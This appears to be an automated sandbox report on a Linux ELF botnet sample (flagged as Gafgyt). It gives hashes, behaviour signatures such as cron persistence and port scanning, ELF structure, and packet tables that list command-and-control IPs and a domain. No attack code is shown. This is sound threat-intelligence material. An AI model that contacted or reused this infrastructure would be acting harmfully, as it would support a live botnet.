Edit tour
Linux
Analysis Report
nshsh4.elf
Overview
General Information
Sample name: | nshsh4.elf |
Analysis ID: | 1552941 |
MD5: | 115387d0ce24b8a053354d2fbb3286e6 |
SHA1: | 694b60e53c9920a25921ba417a4aab1933944527 |
SHA256: | 17789e0fa6307d7e0eccf5c7480d3e4ddb0790a7f135b866f1c929ff1f089bef |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1552941 |
Start date and time: | 2024-11-09 23:03:06 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 31s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | nshsh4.elf |
Detection: | MAL |
Classification: | mal60.troj.linELF@0/1@22/0 |
- VT rate limit hit for: nshsh4.elf
Command: | /tmp/nshsh4.elf |
PID: | 6237 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | you are now apart of hail cock botnet |
Standard Error: | no crontab for root |
- system is lnxubuntu20
- nshsh4.elf New Fork (PID: 6239, Parent: 6237)
- sh New Fork (PID: 6246, Parent: 6239)
- nshsh4.elf New Fork (PID: 6248, Parent: 6237)
- nshsh4.elf New Fork (PID: 6290, Parent: 6248)
- nshsh4.elf New Fork (PID: 6250, Parent: 6237)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: |
Networking |
---|
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior |
Source: | Stderr: no crontab for root: |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Direct Volume Access | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
16% | ReversingLabs | Linux.Backdoor.Gafgyt |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kingstonwikkerink.dyn | 81.29.149.178 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.233.193.45 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.149.218.232 | unknown | Poland | 198401 | GECKONET-ASPL | true | |
31.13.248.89 | unknown | Bulgaria | 34224 | NETERRA-ASBG | false | |
81.29.149.178 | kingstonwikkerink.dyn | Switzerland | 39616 | COMUNICA_IT_SERVICESCH | false | |
91.149.238.18 | unknown | Poland | 41952 | MARTON-ASPL | true | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.233.193.45 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.149.218.232 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
31.13.248.89 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
kingstonwikkerink.dyn | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
NETERRA-ASBG | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
INIT7CH | Get hash | malicious | Mirai, Moobot | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
GECKONET-ASPL | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
FREE-NET-ASFREEnetEU | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
⊘No context
⊘No context
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 306 |
Entropy (8bit): | 5.158759951523546 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQuc1ZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJD:8QjHig8uieHLUHYC+GABjnOGAFkz |
MD5: | 5D2F88F76EFB4AF777291DDEAFD17513 |
SHA1: | DB60928962F729CE1FAA88A0C3E2218248304EFD |
SHA-256: | 1D74D36C572590544329BCE08E6764EBFC8B1A05BC44F9A104DCA08BB2C4BAA3 |
SHA-512: | D8D6F1F601A6BEA97D7250DE78286CC75FDD661F74C74AF1A7CB7E12FA8E4BECF3D41EB595337B580D81A10682C9E588F55FB12F27DF668EF5CB936A874C8835 |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.892687714236376 |
TrID: |
|
File name: | nshsh4.elf |
File size: | 67'860 bytes |
MD5: | 115387d0ce24b8a053354d2fbb3286e6 |
SHA1: | 694b60e53c9920a25921ba417a4aab1933944527 |
SHA256: | 17789e0fa6307d7e0eccf5c7480d3e4ddb0790a7f135b866f1c929ff1f089bef |
SHA512: | b96a8edc6e4c2bd3ecc98ce923173e1c7488850303196b1076f71cac9801e20e221b1d9be7a1ede1cac6a38f30339eb73cc1a52bdb72e4d5c8fbe234b1796035 |
SSDEEP: | 1536:AmFrMb5+kyikbHaKCR/5vXbECFarh+rbK:ASMN9yiCH9CbXbERVEbK |
TLSH: | A4639D23DD6A6E58C16E4AF0B4B48F391323E544D25B0EBB1AA9C6769043EDCF1057F8 |
File Content Preview: | .ELF..............*.......@.4...\.......4. ...(...............@...@.t...t...............x...x.B.x.B......T..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q. |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 67420 |
Section Header Size: | 40 |
Number of Section Headers: | 11 |
Header String Table Index: | 10 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x400094 | 0x94 | 0x30 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x4000e0 | 0xe0 | 0xe900 | 0x0 | 0x6 | AX | 0 | 0 | 32 |
.fini | PROGBITS | 0x40e9e0 | 0xe9e0 | 0x24 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x40ea04 | 0xea04 | 0x1970 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x420378 | 0x10378 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x420380 | 0x10380 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x42038c | 0x1038c | 0x37c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.got | PROGBITS | 0x420708 | 0x10708 | 0x10 | 0x4 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x420718 | 0x10718 | 0x50fc | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.shstrtab | STRTAB | 0x0 | 0x10718 | 0x43 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x400000 | 0x400000 | 0x10374 | 0x10374 | 6.9423 | 0x5 | R E | 0x10000 | .init .text .fini .rodata | |
LOAD | 0x10378 | 0x420378 | 0x420378 | 0x3a0 | 0x549c | 2.8587 | 0x6 | RW | 0x10000 | .ctors .dtors .data .got .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 9, 2024 23:03:51.933407068 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 9, 2024 23:03:54.546072960 CET | 43014 | 17454 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:03:54.553699970 CET | 17454 | 43014 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:03:54.553760052 CET | 43014 | 17454 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:03:54.553904057 CET | 43014 | 17454 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:03:54.561676025 CET | 17454 | 43014 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:03:54.561722994 CET | 43014 | 17454 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:03:54.569339991 CET | 17454 | 43014 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:03:55.901957035 CET | 17454 | 43014 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:03:55.901978970 CET | 17454 | 43014 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:03:55.902019978 CET | 43014 | 17454 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:03:55.902020931 CET | 43014 | 17454 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:03:55.902206898 CET | 43014 | 17454 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:03:57.308685064 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Nov 9, 2024 23:03:59.100449085 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Nov 9, 2024 23:04:10.944195986 CET | 59388 | 15965 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:10.949018955 CET | 15965 | 59388 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:10.949086905 CET | 59388 | 15965 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:10.949132919 CET | 59388 | 15965 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:10.953972101 CET | 15965 | 59388 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:10.954030991 CET | 59388 | 15965 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:10.958892107 CET | 15965 | 59388 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:12.308038950 CET | 15965 | 59388 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:12.308242083 CET | 59388 | 15965 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:12.308279037 CET | 59388 | 15965 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:12.666649103 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 9, 2024 23:04:22.328784943 CET | 35958 | 8554 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:22.333621025 CET | 8554 | 35958 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:22.333709955 CET | 35958 | 8554 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:22.333758116 CET | 35958 | 8554 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:22.338553905 CET | 8554 | 35958 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:22.338752031 CET | 35958 | 8554 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:22.343489885 CET | 8554 | 35958 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:22.905324936 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Nov 9, 2024 23:04:23.713457108 CET | 8554 | 35958 | 193.233.193.45 | 192.168.2.23 |
Nov 9, 2024 23:04:23.713694096 CET | 35958 | 8554 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:23.713773966 CET | 35958 | 8554 | 192.168.2.23 | 193.233.193.45 |
Nov 9, 2024 23:04:28.751091957 CET | 48180 | 6538 | 192.168.2.23 | 81.29.149.178 |
Nov 9, 2024 23:04:28.755934000 CET | 6538 | 48180 | 81.29.149.178 | 192.168.2.23 |
Nov 9, 2024 23:04:28.756032944 CET | 48180 | 6538 | 192.168.2.23 | 81.29.149.178 |
Nov 9, 2024 23:04:28.756081104 CET | 48180 | 6538 | 192.168.2.23 | 81.29.149.178 |
Nov 9, 2024 23:04:28.762275934 CET | 6538 | 48180 | 81.29.149.178 | 192.168.2.23 |
Nov 9, 2024 23:04:28.762341976 CET | 48180 | 6538 | 192.168.2.23 | 81.29.149.178 |
Nov 9, 2024 23:04:28.768455982 CET | 6538 | 48180 | 81.29.149.178 | 192.168.2.23 |
Nov 9, 2024 23:04:29.048614025 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Nov 9, 2024 23:04:29.711940050 CET | 6538 | 48180 | 81.29.149.178 | 192.168.2.23 |
Nov 9, 2024 23:04:29.711986065 CET | 6538 | 48180 | 81.29.149.178 | 192.168.2.23 |
Nov 9, 2024 23:04:29.712405920 CET | 48180 | 6538 | 192.168.2.23 | 81.29.149.178 |
Nov 9, 2024 23:04:29.712407112 CET | 48180 | 6538 | 192.168.2.23 | 81.29.149.178 |
Nov 9, 2024 23:04:29.712407112 CET | 48180 | 6538 | 192.168.2.23 | 81.29.149.178 |
Nov 9, 2024 23:04:44.787225962 CET | 34916 | 10765 | 192.168.2.23 | 91.149.238.18 |
Nov 9, 2024 23:04:44.793601036 CET | 10765 | 34916 | 91.149.238.18 | 192.168.2.23 |
Nov 9, 2024 23:04:44.793659925 CET | 34916 | 10765 | 192.168.2.23 | 91.149.238.18 |
Nov 9, 2024 23:04:44.793680906 CET | 34916 | 10765 | 192.168.2.23 | 91.149.238.18 |
Nov 9, 2024 23:04:44.800295115 CET | 10765 | 34916 | 91.149.238.18 | 192.168.2.23 |
Nov 9, 2024 23:04:44.800357103 CET | 34916 | 10765 | 192.168.2.23 | 91.149.238.18 |
Nov 9, 2024 23:04:44.805162907 CET | 10765 | 34916 | 91.149.238.18 | 192.168.2.23 |
Nov 9, 2024 23:04:45.688066959 CET | 10765 | 34916 | 91.149.238.18 | 192.168.2.23 |
Nov 9, 2024 23:04:45.688168049 CET | 10765 | 34916 | 91.149.238.18 | 192.168.2.23 |
Nov 9, 2024 23:04:45.688417912 CET | 34916 | 10765 | 192.168.2.23 | 91.149.238.18 |
Nov 9, 2024 23:04:45.688417912 CET | 34916 | 10765 | 192.168.2.23 | 91.149.238.18 |
Nov 9, 2024 23:04:45.688417912 CET | 34916 | 10765 | 192.168.2.23 | 91.149.238.18 |
Nov 9, 2024 23:04:53.621387959 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 9, 2024 23:05:00.711292982 CET | 43078 | 11204 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:00.716078043 CET | 11204 | 43078 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:00.716162920 CET | 43078 | 11204 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:00.716217041 CET | 43078 | 11204 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:00.721054077 CET | 11204 | 43078 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:00.721106052 CET | 43078 | 11204 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:00.725898981 CET | 11204 | 43078 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:01.611526012 CET | 11204 | 43078 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:01.611722946 CET | 11204 | 43078 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:01.611778021 CET | 43078 | 11204 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:01.611810923 CET | 43078 | 11204 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:01.611900091 CET | 43078 | 11204 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:06.642304897 CET | 37028 | 15588 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:06.647197008 CET | 15588 | 37028 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:06.647293091 CET | 37028 | 15588 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:06.647330999 CET | 37028 | 15588 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:06.652131081 CET | 15588 | 37028 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:06.652194023 CET | 37028 | 15588 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:06.657023907 CET | 15588 | 37028 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:07.526448011 CET | 15588 | 37028 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:07.526463032 CET | 15588 | 37028 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:07.526839972 CET | 37028 | 15588 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:07.526839972 CET | 37028 | 15588 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:07.527101994 CET | 37028 | 15588 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:12.540920973 CET | 57666 | 20750 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:12.545681000 CET | 20750 | 57666 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:12.545780897 CET | 57666 | 20750 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:12.545794964 CET | 57666 | 20750 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:12.550873041 CET | 20750 | 57666 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:12.550940037 CET | 57666 | 20750 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:12.555845976 CET | 20750 | 57666 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:13.443093061 CET | 20750 | 57666 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:13.443113089 CET | 20750 | 57666 | 91.149.218.232 | 192.168.2.23 |
Nov 9, 2024 23:05:13.443711042 CET | 57666 | 20750 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:13.443711042 CET | 57666 | 20750 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:13.443814039 CET | 57666 | 20750 | 192.168.2.23 | 91.149.218.232 |
Nov 9, 2024 23:05:14.098709106 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Nov 9, 2024 23:05:23.464217901 CET | 51544 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:23.469186068 CET | 7293 | 51544 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:23.469294071 CET | 51544 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:23.469352007 CET | 51544 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:23.474267960 CET | 7293 | 51544 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:23.474344969 CET | 51544 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:23.479232073 CET | 7293 | 51544 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:24.460608959 CET | 7293 | 51544 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:24.460796118 CET | 51544 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:24.460796118 CET | 51544 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:49.486831903 CET | 51546 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:49.492135048 CET | 7293 | 51546 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:49.492211103 CET | 51546 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:49.492261887 CET | 51546 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:49.499027014 CET | 7293 | 51546 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:49.499089003 CET | 51546 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:49.504720926 CET | 7293 | 51546 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:50.511017084 CET | 7293 | 51546 | 31.13.248.89 | 192.168.2.23 |
Nov 9, 2024 23:05:50.511356115 CET | 51546 | 7293 | 192.168.2.23 | 31.13.248.89 |
Nov 9, 2024 23:05:50.511356115 CET | 51546 | 7293 | 192.168.2.23 | 31.13.248.89 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 9, 2024 23:03:49.493223906 CET | 51721 | 53 | 192.168.2.23 | 139.84.165.176 |
Nov 9, 2024 23:03:49.613197088 CET | 51459 | 53 | 192.168.2.23 | 139.84.165.176 |
Nov 9, 2024 23:03:54.498627901 CET | 59720 | 53 | 192.168.2.23 | 80.152.203.134 |
Nov 9, 2024 23:03:54.545224905 CET | 53 | 59720 | 80.152.203.134 | 192.168.2.23 |
Nov 9, 2024 23:03:54.618506908 CET | 40492 | 53 | 192.168.2.23 | 80.152.203.134 |
Nov 9, 2024 23:03:54.656021118 CET | 53 | 40492 | 80.152.203.134 | 192.168.2.23 |
Nov 9, 2024 23:04:00.903851986 CET | 50541 | 53 | 192.168.2.23 | 137.220.52.23 |
Nov 9, 2024 23:04:05.909435987 CET | 49112 | 53 | 192.168.2.23 | 70.34.254.19 |
